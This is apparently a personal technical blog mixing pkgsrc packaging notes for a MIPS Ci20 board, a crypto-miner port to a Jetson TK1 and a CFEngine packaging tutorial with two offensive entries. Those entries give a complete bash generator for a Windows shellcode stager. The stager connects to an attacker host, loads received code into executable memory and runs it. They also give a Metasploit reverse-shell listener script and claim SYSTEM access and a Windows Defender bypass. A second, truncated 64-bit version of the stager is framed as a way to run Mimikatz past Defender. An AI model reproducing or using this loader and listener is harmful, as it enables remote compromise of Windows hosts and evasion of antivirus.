drwxr-xr-x 2 root root 1016 Dec 3 22:07 libffi-3.2.1nb4
drwxr-xr-x 2 root root 944 Dec 3 21:35 libgpg-error-1.27
drwxr-xr-x 2 root root 728 Dec 2 15:32 libtool-base-2.4.6
drwxr-xr-x 2 root root 728 Dec 3 20:05 libXau-1.0.8
drwxr-xr-x 2 root root 728 Dec 3 20:07 libXdmcp-1.1.2
drwxr-xr-x 2 root root 728 Dec 3 19:47 libxml2-2.9.6
drwxr-xr-x 2 root root 872 Dec 3 22:07 mozilla-rootcerts-1.0.20170121nb6
drwxr-xr-x 2 root root 728 Dec 2 15:08 nawk-20121220nb1
drwxr-xr-x 2 root root 728 Dec 2 15:32 nbpatch-20151107
drwxr-xr-x 2 root root 728 Dec 3 11:02 pax-20080110nb2
drwxr-xr-x 2 root root 944 Dec 3 21:32 perl-5.26.0nb3
drwxr-xr-x 2 root root 728 Dec 2 15:35 pkgconf-1.3.5
-rw-r--r-- 1 root root 2170880 Dec 3 22:07 pkgdb.byfile.db
drwxr-xr-x 2 root root 944 Dec 2 15:30 pkg_install-20170419
drwxr-xr-x 2 root root 728 Dec 3 19:51 presentproto-1.1
drwxr-xr-x 2 root root 656 Dec 3 09:25 pth-2.0.7nb5
drwxr-xr-x 2 root root 656 Dec 3 22:07 python27-2.7.14
drwxr-xr-x 2 root root 728 Dec 3 19:58 randrproto-1.5.0
drwxr-xr-x 2 root root 800 Dec 3 10:45 readline-7.0
drwxr-xr-x 2 root root 728 Dec 2 15:35 renderproto-0.11.1
drwxr-xr-x 2 root root 728 Dec 3 19:59 tradcpp-0.5.2nb2
drwxr-xr-x 2 root root 728 Dec 3 21:29 unzip-6.0nb8
drwxr-xr-x 2 root root 728 Dec 3 19:47 xcb-proto-1.12
drwxr-xr-x 2 root root 728 Dec 3 20:01 xcmiscproto-1.2.2
drwxr-xr-x 2 root root 728 Dec 3 19:53 xextproto-7.3.0
drwxr-xr-x 2 root root 728 Dec 3 20:02 xf86bigfontproto-1.2.0
drwxr-xr-x 2 root root 728 Dec 3 19:57 xf86driproto-2.1.1nb1
drwxr-xr-x 2 root root 728 Dec 3 19:56 xf86vidmodeproto-2.3.1
drwxr-xr-x 2 root root 1144 Dec 3 19:47 xmlcatmgr-2.2nb1
drwxr-xr-x 2 root root 728 Dec 2 15:35 xproto-7.0.31
drwxr-xr-x 2 root root 728 Dec 3 20:03 xtrans-1.3.5
drwxr-xr-x 2 root root 800 Dec 3 19:47 xz-5.2.3nb1

CI20 pkgsrc binary repository

Feel free to use the pkgsrc binaries I have built for the mipsel CI20 Creator board

https://45.76.81.249:8000/pkgsrc/

I have used GCC 7.2.0 on the stock Linux mipsbox 3.0.8-00847-g2e5af7d #1 SMP PREEMPT Wed Jun 24 10:10:52 BST 2015 mips GNU/Linux

The only thing I have added is a new symlink to libstdc++.so.6.0.24 from the GCC build in /usr/lib/mipsel-linux-gnu, because of the GLIBCXX_3.4.21 requirement on libstdc++.so.6 during the Node.js build.

Will keep the repo updated as I progress, hopefully further.

Running Metasploit Framework on Debian 7.5 mipsel Ci20

The stock Debian Linux 7.5 does not have a recent Ruby in the repos for the mipsel architecture, so I decided to use Ruby24 from pkgsrc (check the previous two articles). I have created a small repo of all the binary packages I have managed to build via pkgsrc here:

https://45.76.81.249:8000/pkgsrc/debian-ci20/All/

So once I got ruby24 up and running I set up the environment for Metasploit Framework:

- Make sure you set symlinks to pkgsrc ruby 
root@mipsbox:/usr/bin# 
 0 lrwxrwxrwx 1 root root 19 Dec 10 20:03 ruby -> /usr/pkg/bin/ruby24
 0 lrwxrwxrwx 1 root root 18 Dec 10 20:03 gem -> /usr/pkg/bin/gem24
 0 lrwxrwxrwx 1 root root 19 Dec 10 20:14 bundle -> /usr/pkg/bin/bundle
 0 lrwxrwxrwx 1 root root 20 Dec 10 20:14 bundler -> /usr/pkg/bin/bundler

- Proceed on setting up Metasploit-Framework 

root@mipsbox:~/# git clone https://github.com/rapid7/metasploit-framework
root@mipsbox:~/# cd metasploit-framework 
root@mipsbox:~/metasploit-framework# apt-get install libpcap0.8-dev
root@mipsbox:~/metasploit-framework# apt-get install libsqlite3-dev
root@mipsbox:~/metasploit-framework# gem install backports
root@mipsbox:~/metasploit-framework# gem install os 
root@mipsbox:~/metasploit-framework# git config --global user.name "user"
root@mipsbox:~/metasploit-framework# git config --global user.email "user@email.com"
root@mipsbox:~/metasploit-framework# bundle install
root@mipsbox:~/metasploit-framework# ./msfupdate

Now that we have Metasploit running on the Ci20 (it takes approx. 3-4 minutes to load) we should put it to a test to see if it works on the mipsel architecture.

I used the following scenario for the test:

  • Generate a payload.exe on the Ci20 mipsel device via a custom generator script
  • Move the payload.exe to another machine that will host it via Samba, and run strip on the x86 architecture to get rid of all symbols from payload.exe (this cannot be done on the mipsel arch)
  • Execute the listener on the Ci20 mipsel device
  • Execute the payload.exe on Windows 10 (Nov 2017 cumulative updates)

To cross-compile Windows PE32/64 binaries on the Ci20 we need mingw, which can be installed via apt:

root@mipsbox:~/metasploit-framework# apt-get install gcc-mingw-w64-i686 gcc-mingw-w64-x86-64

The Generator and the Listener used in these tests are here:

Generator :

#!/bin/bash
clear
echo "****************************************************************"
echo " Automatic C source code generator - FOR METASPLOIT "
echo " Based on rsmudge metasploit-loader "
echo "****************************************************************" 
echo -en 'Metasploit server IP : ' 
read ip
echo -en 'Metasploit port number : ' 
read port

echo '#include <stdio.h>'> temp.c 
echo '#include <stdlib.h>' >> temp.c 
echo '#include <winsock2.h>' >> temp.c
echo '#include <windows.h>' >> temp.c 
echo -n 'unsigned char server[]="' >> temp.c 
echo -n $ip >> temp.c 
echo -n '";' >> temp.c 
echo '' >> temp.c 
echo -n 'unsigned char serverp[]="' >> temp.c 
echo -n $port >> temp.c 
echo -n '";' >> temp.c 
echo '' >> temp.c 
echo 'void winsock_init() {' >> temp.c 
echo ' WSADATA wsaData;' >> temp.c 
echo ' WORD wVersionRequested;' >> temp.c 
echo ' wVersionRequested = MAKEWORD(2, 2);'>> temp.c 
echo ' if (WSAStartup(wVersionRequested, &wsaData) < 0) {' >> temp.c 
echo ' printf("bad\n"); '>> temp.c 
echo ' WSACleanup(); '>> temp.c 
echo ' exit(1);'>> temp.c 
echo ' }' >> temp.c 
echo ' }' >> temp.c 
echo ' void punt(SOCKET my_socket, char * error) {' >> temp.c 
echo ' printf("r %s\n", error);'>> temp.c 
echo ' closesocket(my_socket);'>> temp.c 
echo ' WSACleanup();'>> temp.c 
echo ' exit(1);' >> temp.c 
echo ' }' >> temp.c 
echo ' int recv_all(SOCKET my_socket, void * buffer, int len) {' >> temp.c 
echo ' int tret = 0;'>> temp.c 
echo ' int nret = 0;'>>temp.c 
echo ' void * startb = buffer;'>> temp.c 
echo ' while (tret < len) {'>>temp.c 
echo ' nret = recv(my_socket, (char *)startb, len - tret, 0);'>> temp.c 
echo ' startb += nret;'>> temp.c 
echo ' tret += nret;'>>temp.c 
echo ' if (nret == SOCKET_ERROR)'>> temp.c 
echo ' punt(my_socket, "no data");'>> temp.c 
echo ' }'>>temp.c 
echo ' return tret;'>> temp.c 
echo '}' >> temp.c 
echo 'SOCKET wsconnect(char * targetip, int port) {'>> temp.c 
echo ' struct hostent * target;' >> temp.c 
echo ' struct sockaddr_in sock;' >> temp.c
echo ' SOCKET my_socket;'>>temp.c 
echo ' my_socket = socket(AF_INET, SOCK_STREAM, 0);'>> temp.c 
echo ' if (my_socket == INVALID_SOCKET)'>> temp.c 
echo ' punt(my_socket, ".");'>>temp.c 
echo ' target = gethostbyname(targetip);'>>temp.c 
echo ' if (target == NULL)'>>temp.c 
echo ' punt(my_socket, "..");'>>temp.c 
echo ' memcpy(&sock.sin_addr.s_addr, target->h_addr, target->h_length);'>>temp.c 
echo ' sock.sin_family = AF_INET;'>> temp.c 
echo ' sock.sin_port = htons(port);'>>temp.c 
echo ' if ( connect(my_socket, (struct sockaddr *)&sock, sizeof(sock)) )'>>temp.c 
echo ' punt(my_socket, "...");'>>temp.c 
echo ' return my_socket;'>>temp.c 
echo '}' >> temp.c 
echo 'int main(int argc, char * argv[]) {' >> temp.c 
echo ' FreeConsole();'>>temp.c 
echo ' Sleep(10);'>>temp.c 
echo ' ULONG32 size;'>>temp.c 
echo ' char * buffer;'>>temp.c 
echo ' void (*function)();'>>temp.c 
echo ' winsock_init();'>> temp.c 
echo ' SOCKET my_socket = wsconnect(server, atoi(serverp));'>>temp.c 
echo ' int count = recv(my_socket, (char *)&size, 4, 0);'>>temp.c 
echo ' if (count != 4 || size <= 0)'>>temp.c 
echo ' punt(my_socket, "error lenght\n");'>>temp.c 
echo ' buffer = VirtualAlloc(0, size + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);'>>temp.c 
echo ' if (buffer == NULL)'>>temp.c 
echo ' punt(my_socket, "error in buf\n");'>>temp.c 
echo ' buffer[0] = 0xBF;'>>temp.c 
echo ' memcpy(buffer + 1, &my_socket, 4);'>>temp.c 
echo ' count = recv_all(my_socket, buffer + 5, size);'>>temp.c 
echo ' function = (void (*)())buffer;'>>temp.c 
echo ' function();'>>temp.c 
echo ' return 0;'>>temp.c 
echo '}' >> temp.c 
echo '(+) Compiling binary ..' 
i686-w64-mingw32-gcc temp.c -o payload.exe -lws2_32 -mwindows 
ls -la temp.c
file=`ls -la payload.exe` ; echo '(+)' $file

Listener

#!/bin/bash
clear
echo "***************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT "
echo " For Automatic Teensy programming and deployment "
echo "***************************************************************"
echo -e "What IP are we gonna listen to ? \c"
read host
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo "Starting the meterpreter listener.."
echo -n './msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp ; set LHOST ' > run.listener.sh 
echo -n $host >> run.listener.sh 
echo -n '; set LPORT ' >> run.listener.sh 
echo -n $port >> run.listener.sh 
echo -n '; run"' >> run.listener.sh 
chmod +x run.listener.sh 
./run.listener.sh

The result was good, a reverse shell was acquired, session was elevated to NT AUTHORITY/SYSTEM and inbuilt Windows Defender bypassed.

Video attached

Creator Ci-20 pkgsrc build progress update

As of today there are 256 pkgsrc packages for the Creator Ci-20 stock Debian 7.5 image, available here: https://45.76.81.249:8000/pkgsrc/debian-ci20/All/

One might ask why not just upgrade the existing Debian 7.5 to something newer, such as Debian 8 2016-02-02 Beta or Debian 8 2015-09-09 as described here https://elinux.org/CI20_Distros, or simply move the existing 7.5 userland to TESTING or UNSTABLE as described here (example with a gcc upgrade):

  • Add the Debian testing repo to your apt sources by creating a file in the /etc/apt/sources.list.d folder containing the line: deb http://ftp.us.debian.org/debian testing main contrib non-free
  • Instruct Debian to use testing sources for certain packages by creating a file in /etc/apt/preferences.d containing the following:
    Package: *
    Pin: release a=testing
    Pin-Priority: 100
  • Update the apt database: sudo apt-get update
  • Install gcc from testing: sudo apt-get install -t testing gcc

I wanted to touch the existing Debian 7.5 environment as little as possible and keep the development environment separated in /usr/pkg; I also have bad experience with getting into dependency hell when mixing stable/testing/unstable repos, at the risk of breaking the system.

PKGSRC comes to the rescue !

More to come; please excuse some hacks and workarounds (early packages have no man/info pages)

I got stuck on the /pkgsrc/lang/guile20  for a while before I got it to build properly…

Anyways … the collection feels like something made by Freak Brothers …

Anyways … feel free to use it, take it with a grain of salt ;)

x11vnc compiled from pkgsrc-Q3-2017 running

Running x11vnc like this and connection normally from the remote via TightVNC client

/usr/pkg/bin/x11vnc -xkb -noxrecord -noxfixes -noxdamage -display :0 -auth /var/run/lightdm/root/:0 -usepw

P.S  I have learned a LOT using pkgsrc on mipsel Ci20 btw … you should try it !

Nvidia Jetson TK1 experiments

Decided to try and port some mining software that uses CUDA and cryptonight crypto (XMR) to the Nvidia Jetson TK1 development board that I have acquired recently to study.

This device has the following specifications. Processor:

  • GPU consisting of 192 ALUs using Kepler technology
  • 28 nm HPM process
  • Released in Q2 2014
  • Power consumption: 8 watts

I have ported xmrMiner (https://github.com/xmrMiner) onto this device, since it does not build on the Jetson TK1 without modifications to the code: the board is a 32-bit ARMv7 platform and can only use CUDA 6.5, as Nvidia dropped 32-bit support for CUDA after that release.

The port consisted of modifying the GPU assembler functions in cryptonight/cuda_cryptonight_core.cu   and some ARM declarations in sha2.c

The required version of cmake was compiled via pkgsrc-current on the Jetson (pkgsrc is awesome here) with no major issues.

I have created a git repo for this specific fork here

https://github.com/DoktorCranium/xmrMiner-tk1

Below is the GPU miner running  – benchmarking gave approx 15 H/sec

With a combination of xmrig ( https://github.com/xmrig/xmrig) you can get additional 12 – 15 H/sec from the Cortex ARM CPU, so overall  performance would be around 25 – 30 H/sec from both CUDA GPU and the CPU.

This was a nice introduction to CUDA programming and ARM porting, which I enjoyed very much over this weekend.

Writing custom pkgsrc packages on Debian mipsel Ci20

I have been using the pkgsrc framework since I first came to know and use NetBSD, which was around 2005.

There is some good documentation available here https://www.netbsd.org/docs/pkgsrc/creating.html and here https://wiki.netbsd.org/pkgsrc/intro_to_packaging/. I wanted to share a real-life example of creating such a custom package (I have chosen CFEngine-3.11.0, which is present neither in pkgsrc-current nor in pkgsrc-Q1-2018; the latest version there is cfengine-3.7.3).

CFEngine is an open source configuration management system, written by Mark Burgess. Its primary function is to provide automated configuration and maintenance of large-scale computer systems, including the unified management of servers, desktops, consumer and industrial devices, embedded networked devices, mobile smartphones, and tablet computers.

I have created the below example on the Debian 7.5 mipsel Ci20 developer board.

1.1) Pre-requisites

  • Bootstrapped pkgsrc environment on the Ci20 (used a 16 GB SD card)
  • Basic knowledge of the pkgsrc environment
  • Some free time and patience

1.2) Preparing the tools for custom packages build

Make sure you build and install the following packages:

# cd /usr/pkgsrc/pkgtools/url2pkg
# /usr/pkg/bin/bmake install clean 

# cd /usr/pkgsrc/pkgtools/pkgdiff
# /usr/pkg/bin/bmake install clean

Next we create a WIP (work in progress) directory within the pkgsrc directory structure

# mkdir -p /usr/pkgsrc/wip/cfengine

We have decided to create the latest cfengine package available, which is 3.11.0, so we take note of the download URL, go to the new build directory and call url2pkg to initiate the package preparation:

# cd /usr/pkgsrc/wip/cfengine
# /usr/pkg/bin/url2pkg https://cfengine-package-repos.s3.amazonaws.com/tarballs/cfengine-3.11.0.tar.gz

Once the script finishes, it will open an editor and let you add customized options to the Makefile.

Save the edit and exit (vi :wq); you will get this message once the script finishes:

===> Overriding tools for cfengine-3.11.0
===> Extracting for cfengine-3.11.0
url2pkg> Adjusting the Makefile.

Remember to correct CATEGORIES, HOMEPAGE, COMMENT, and DESCR when you're done!

The final file structure of the skeleton cfengine pkgsrc package looks as follows:

root@mipsbox:/usr/pkgsrc/wip/cfengine# ls -al
total 24
drwxr-xr-x 3 root root 4096 Jan 18 20:50 .
drwxr-xr-x 10 root root 4096 Jan 18 20:47 ..
-rw-r--r-- 1 root root 0 Jan 18 20:47 DESCR
-rw-r--r-- 1 root root 392 Jan 18 20:50 Makefile
-rw-r--r-- 1 root root 18 Jan 18 20:47 PLIST
-rw-r--r-- 1 root root 367 Jan 18 20:49 distinfo
drwxr-xr-x 11 root root 4096 Jan 18 20:50 work


I have edited the Makefile in this way:

# $NetBSD$

DISTNAME= cfengine-3.11.0
CATEGORIES= wip
MASTER_SITES= https://cfengine-package-repos.s3.amazonaws.com/tarballs/
MAINTAINER= INSERT_YOUR_MAIL_ADDRESS_HERE
HOMEPAGE= https://cfengine.com/product/community/
COMMENT= Tool for automating system administration
LICENSE= gnu-gpl-v3

GNU_CONFIGURE= yes
CONFIGURE_ARGS+= --with-postgresql=${BUILDLINK_PREFIX.postgresql}

USE_LIBTOOL= yes

.include "../../databases/postgresql92-client/buildlink3.mk"
.include "../../databases/lmdb/buildlink3.mk"
.include "../../devel/pcre/buildlink3.mk"
.include "../../security/openssl/buildlink3.mk"
.include "../../textproc/libxml2/buildlink3.mk"
.include "../../mk/pthread.buildlink3.mk"
.include "../../mk/bsd.pkg.mk"

Since the cfengine-3.11.0 server build depends on either mysql or postgresql, I have included the configure option to build it with postgresql support (a more advanced way is to provide an options.mk where one can choose between the mysql and postgresql options, but I'm not going to cover this here), as well as lmdb, pcre, openssl and libxml2.

Next we will try and actually build the above via bmake and see if we get any errors that need to be addressed

# cd /usr/pkgsrc/wip/cfengine 
# /usr/pkg/bin/bmake

Since I already have quite a number of packages pre-built on my Ci20, I won't have to wait long for the dependent packages to compile, but the build ends with the following error:

DONE: Configuration done. Run make/gmake to build CFEngine Community.
=> Modifying libtool scripts to use pkgsrc libtool
=> Modifying libtool scripts to use pkgsrc depcomp
===> Building for cfengine-3.11.0
bmake: "/disk/pkgsrc/wip/tt/work/cfengine-3.11.0/Makefile" line 1099: Variable/Value missing from "export"
bmake: Fatal errors encountered -- cannot continue
bmake: stopped in /disk/pkgsrc/wip/cfengine/work/cfengine-3.11.0
*** Error code 1

Stop.
bmake[1]: stopped in /usr/pkgsrc/wip/cfengine
*** Error code 1

Stop.
bmake: stopped in /usr/pkgsrc/wip/cfengine

In cases like this you need to create patches that fix the original code. The error above means that bmake does not understand line 1099 of the generated Makefile: the export VARIABLE directive is a GNU make extension, and bmake expects a variable assignment there. We can look at that line of the generated Makefile in the work directory:

# cat /disk/pkgsrc/wip/tt/work/cfengine-3.11.0/Makefile | head -n 1099 | tail -n 1
export TAR_OPTIONS

So bmake stops at the export of the TAR_OPTIONS variable; let's search for that string only:

# grep -r TAR_OPTIONS /disk/pkgsrc/wip/tt/work/cfengine-3.11.0/Makefile 
TAR_OPTIONS = --owner=0 --group=0
export TAR_OPTIONS

The above Makefile is generated by the configure script (config.status substitutes the configured values into Makefile.in); Makefile.in itself was produced by automake from Makefile.am when the release tarball was made and ships pre-generated, so all three files carry the lines:

# grep -r TAR_OPTIONS /disk/pkgsrc/wip/tt/work/cfengine-3.11.0/Makefile.in
TAR_OPTIONS = --owner=0 --group=0
export TAR_OPTIONS
# grep -r TAR_OPTIONS /disk/pkgsrc/wip/tt/work/cfengine-3.11.0/Makefile.am
TAR_OPTIONS = --owner=0 --group=0
export TAR_OPTIONS

So a quick workaround is to remove the unnecessary variable (2 lines) and prepare a diff that can be turned into a custom patch file. We will be using the pkgvi program to edit the original file like so:

# /usr/pkg/bin/pkgvi /disk/pkgsrc/wip/cfengine/work/cfengine-3.11.0/Makefile.am

Remove the 2 offending lines containing the TAR_OPTIONS variable and save (vi :wq)

pkgvi: File was modified. For a diff, type:
pkgdiff "/disk/pkgsrc/wip/tt/work/cfengine-3.11.0/Makefile.am"

To produce a diff run the above command

# pkgdiff "/disk/pkgsrc/wip/cfengine/work/cfengine-3.11.0/Makefile.am"
$NetBSD$

--- /disk/pkgsrc/wip/cfengine/work/cfengine-3.11.0/Makefile.am.orig 2017-08-03 15:28:40.000000000 +0000
+++ /disk/pkgsrc/wip/cfengine/work/cfengine-3.11.0/Makefile.am
@@ -48,8 +48,6 @@ SUBDIRS = libcompat \
 
 
 # Hide the buildsystem's username, at least with GNU tar.
-TAR_OPTIONS = --owner=0 --group=0
-export TAR_OPTIONS
 
 
 EXTRA_DIST = ChangeLog INSTALL README.md LICENSE CFVERSION
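Review bot: removing these two lines from Makefile.am has no effect on this build, because the tarball ships a pre-generated Makefile.in that still carries TAR_OPTIONS and configure only substitutes Makefile.in into Makefile; automake is never rerun, which is exactly what the second bmake run further down shows. Patch Makefile.in instead (or as well), or avoid the patch altogether by adding gmake to USE_TOOLS in the package Makefile so the package is built with GNU make, which understands export. The removed lines only matter for GNU tar invocations such as make dist, so dropping them does not change the built binaries.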

The output should be saved to a patch file in the /usr/pkgsrc/wip/cfengine/patches directory

# mkdir -p  /usr/pkgsrc/wip/cfengine/patches 
# /usr/pkg/bin/pkgdiff "/disk/pkgsrc/wip/cfengine/work/cfengine-3.11.0/Makefile.am" > /usr/pkgsrc/wip/cfengine/patches/patch-Makefile.am

Once the patch file called patch-Makefile.am is in place we need to regenerate the checksums in the distinfo meta file like so:

# cd /usr/pkgsrc/wip/cfengine
# /usr/pkg/bin/bmake distinfo

So let's try and build it one more time and check whether the above patch fixes our “TAR” issue:

# cd /usr/pkgsrc/wip/cfengine
# rm -rf /usr/pkgsrc/wip/cfengine/work
# bmake

The same error comes again! We still have TAR_OPTIONS in Makefile.in, although it is gone from Makefile.am:

# grep -r TAR_OPTIONS /disk/pkgsrc/wip/tt/work/cfengine-3.11.0/Makefile.in
TAR_OPTIONS = --owner=0 --group=0
export TAR_OPTIONS
# grep -r TAR_OPTIONS /disk/pkgsrc/wip/tt/work/cfengine-3.11.0/Makefile.am

This is the automake flow described above at work: configure never regenerates Makefile.in from Makefile.am (that would need automake to be rerun), it only substitutes the shipped Makefile.in into Makefile, so the patch to Makefile.am is never seen by the build. I have used a little dirty hack to strip the lines from the generated Makefile.in and Makefile once the configure script finishes, by adding the following lines towards the end of the configure script, which produced the patch file below. (A cleaner fix is a patch-Makefile.in in the patches directory, or adding gmake to USE_TOOLS in the package Makefile so the package is built with GNU make, where the export directive is valid.)

$NetBSD$

--- /usr/pkgsrc/wip/cfengine/work/cfengine-3.11.0/configure.orig 2017-08-03 15:29:11.000000000 +0000
+++ /usr/pkgsrc/wip/cfengine/work/cfengine-3.11.0/configure
@@ -24850,6 +24854,9 @@ if test -n "$ac_unrecognized_opts" && te
 $as_echo "$as_me: WARNING: unrecognized options: $ac_unrecognized_opts" >&2;}
 fi
 
+#Added a small hack here to fix the TAR_ issue in Makefile.in
+sed -i '/TAR_/d' Makefile.in
+sed -i '/TAR_/d' Makefile 
 
 { $as_echo "$as_me:${as_lineno-$LINENO}: result: DONE: Configuration done. Run make/gmake to build CFEngine Community." >&5
 $as_echo "DONE: Configuration done. Run make/gmake to build CFEngine Community." >&6; }
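Review bot: sed -i '/TAR_/d' deletes every line containing the substring TAR_ from both files, not only the two TAR_OPTIONS lines; anchor the expression to the variable, e.g. sed -i '/^TAR_OPTIONS *=/d; /^export TAR_OPTIONS$/d' Makefile. At this point in configure the Makefile has already been written by config.status, so the edit to Makefile is what actually fixes the bmake run and the edit to Makefile.in only matters if config.status is rerun. Patching the generated configure script is also fragile across version bumps; a patch-Makefile.in in patches/ (or gmake in USE_TOOLS) expresses the same fix in one place that survives the next url2pkg run.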

Save it as follows

# cd /usr/pkgsrc/wip/cfengine/work/cfengine-3.11.0
# /usr/pkg/bin/pkgvi /usr/pkgsrc/wip/cfengine/work/cfengine-3.11.0/configure
pkgvi: File was modified. For a diff, type:
pkgdiff "work/cfengine-3.11.0/configure"
# /usr/pkg/bin/pkgdiff "/usr/pkgsrc/wip/cfengine/work/cfengine-3.11.0/configure" > /usr/pkgsrc/wip/cfengine/patches/patch-configure


Rebuild the SHA1 checksums again

# cd /usr/pkgsrc/wip/cfengine
# /usr/pkg/bin/bmake distinfo

And run bmake again; it takes approx. 30 minutes to build on the Ci20, but this time we are successful!

<.....cut....> 
Making all in unit
Making all in load
Making all in acceptance
Making all in 25_cf-execd
 CC cf-execd-rpl-functions.o
 CCLD cf-execd-test
 CC mock_package_manager.lo
 CCLD libmock_package_manager.la
 CCLD mock_package_manager
 CC no_fds.o
 CCLD no_fds
 CC xml_c14nize-xml-c14nize.o
 CCLD xml-c14nize
root@mipsbox:/usr/pkgsrc/wip/cfengine#

Next we run a test install

# cd /usr/pkgsrc/wip/cfengine

# /usr/pkg/bin/bmake stage-install CHECK_FILES=no

Check that .destdir got populated; the following should be visible:

<----cut---->
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/share/doc/cfengine/examples/translatepath.cf
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/share/doc/cfengine/examples/edit_replace_string.cf
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/share/doc/cfengine/examples/app_baseline.cf
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/share/doc/cfengine/examples/packagesmatching.cf
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/share/doc/cfengine/examples/mustache_comments.cf
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/share/doc/cfengine/examples/varnet.cf
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/share/doc/cfengine/examples/exec_in_sequence.cf
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/share/doc/cfengine/examples/process_signalling.cf
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/share/doc/cfengine/examples/sort.cf
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/share/doc/cfengine/examples/strcmp.cf
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/share/doc/cfengine/examples/classmatch.cf
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/share/doc/cfengine/examples/isipinsubnet.cf
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/share/doc/cfengine/examples/rename.cf
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/share/doc/cfengine/README.md
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/bin
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/bin/cf-promises
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/bin/cf-net
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/bin/cf-runagent
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/bin/cf-key
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/bin/cf-upgrade
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/bin/cf-agent
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/bin/cf-execd
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/bin/cf-serverd
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/bin/cf-monitord
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/bin/rpmvercmp
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/var
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/var/cfengine
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/var/cfengine/plugins
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/var/cfengine/ppkeys
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/var/cfengine/modules
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/var/cfengine/inputs
/usr/pkgsrc/wip/cfengine/work/.destdir/usr/pkg/var/cfengine/outputs


Make sure you also update /usr/pkgsrc/wip/cfengine/DESCR:

Cfengine, or the "configuration engine" is a very high level language
for building expert systems which administrate and configure large
computer networks. Cfengine uses the idea of classes and a primitive
form of intelligence to define and automate the configuration of
large systems in the most economical way possible. Cfengine is
designed to be a part of computer immune system.

Cfengine 3 is operationally backwards compatible with Cfengine 2, but the
language is not. Cfengine 3 is not a drop-in replacement for Cfengine 2.

Once this is done we populate the PLIST inventory

# cd /usr/pkgsrc/wip/cfengine
# /usr/pkg/bin/bmake print-PLIST >PLIST

And finally run a proper install

# /usr/pkg/bin/bmake install

Congratulations, your first binary pkgsrc package will land in /usr/pkgsrc/packages/All/ and will get installed into /usr/pkg environment.

Running latest x64 Mimikatz on Windows 10


I have been keeping this journal for 7 years now, and I guess this is a reason to add some interesting stuff (lately I have been busy in the compiler world on various architectures and different developer boards).

Here is a short little exercise for this evening: getting the latest mimikatz running on a Windows 10 machine (build 10.0.16299.192) with all the latest updates installed and Windows Defender enabled.

Microsoft has gotten really good at detecting all sorts of techniques, and even a good custom ps1 mimikatz script that I have used a lot in the past gets flagged now.

This customized method does not work anymore https://astr0baby.wordpress.com/2017/03/28/mimikatz-2-1-1-powershell-generator/

So I have played a little with my other generator scripts and came up with the following, which has been reliable so far; all that I had to do was make it produce a 64-bit PE32+ executable and start the listener for a 64-bit reverse shell.

Here are my scripts and steps (make sure you have the mingw-w64 cross toolchain installed; these are the packages on my build host):

ii binutils-mingw-w64-x86-64 2.26-3ubuntu1+6.6 amd64 Cross-binutils for Win64 (x64) using MinGW-w64
ii g++-mingw-w64-x86-64 5.3.1-8ubuntu3+17 amd64 GNU C++ compiler for MinGW-w64 targeting Win64
ii gcc-mingw-w64-x86-64 5.3.1-8ubuntu3+17 amd64 GNU C compiler for MinGW-w64 targeting Win64
ii mingw-w64-x86-64-dev 4.0.4-2 all Development files for MinGW-w64 targeting Win64

The loader generator script:
#!/bin/bash
clear
echo "****************************************************************"
echo " Automatic C source code generator - FOR METASPLOIT "
echo " Based on rsmudge metasploit-loader "
echo " PE32+ executable (GUI) x86-64 "
echo "****************************************************************" 
echo -en 'Metasploit server IP : ' 
read ip
echo -en 'Metasploit port number : ' 
read port

echo '#include <stdio.h>'> temp.c 
echo '#include <stdlib.h>' >> temp.c 
echo '#include <winsock2.h>' >> temp.c
echo '#include <windows.h>' >> temp.c 
echo -n 'unsigned char server[]="' >> temp.c 
echo -n $ip >> temp.c 
echo -n '";' >> temp.c 
echo '' >> temp.c 
echo -n 'unsigned char serverp[]="' >> temp.c 
echo -n $port >> temp.c 
echo -n '";' >> temp.c 
echo '' >> temp.c 
echo 'void winsock_init() {' >> temp.c 
echo ' WSADATA wsaData;' >> temp.c 
echo ' WORD wVersionRequested;' >> temp.c 
echo ' wVersionRequested = MAKEWORD(2, 2);'>> temp.c 
# WSAStartup returns a nonzero error code on failure, never a negative value
echo ' if (WSAStartup(wVersionRequested, &wsaData) != 0) {' >> temp.c 
echo ' printf("bad\n"); '>> temp.c 
echo ' WSACleanup(); '>> temp.c 
echo ' exit(1);'>> temp.c 
echo ' }' >> temp.c 
echo ' }' >> temp.c 
echo ' void punt(SOCKET my_socket, char * error) {' >> temp.c 
echo ' printf("r %s\n", error);'>> temp.c 
echo ' closesocket(my_socket);'>> temp.c 
echo ' WSACleanup();'>> temp.c 
echo ' exit(1);' >> temp.c 
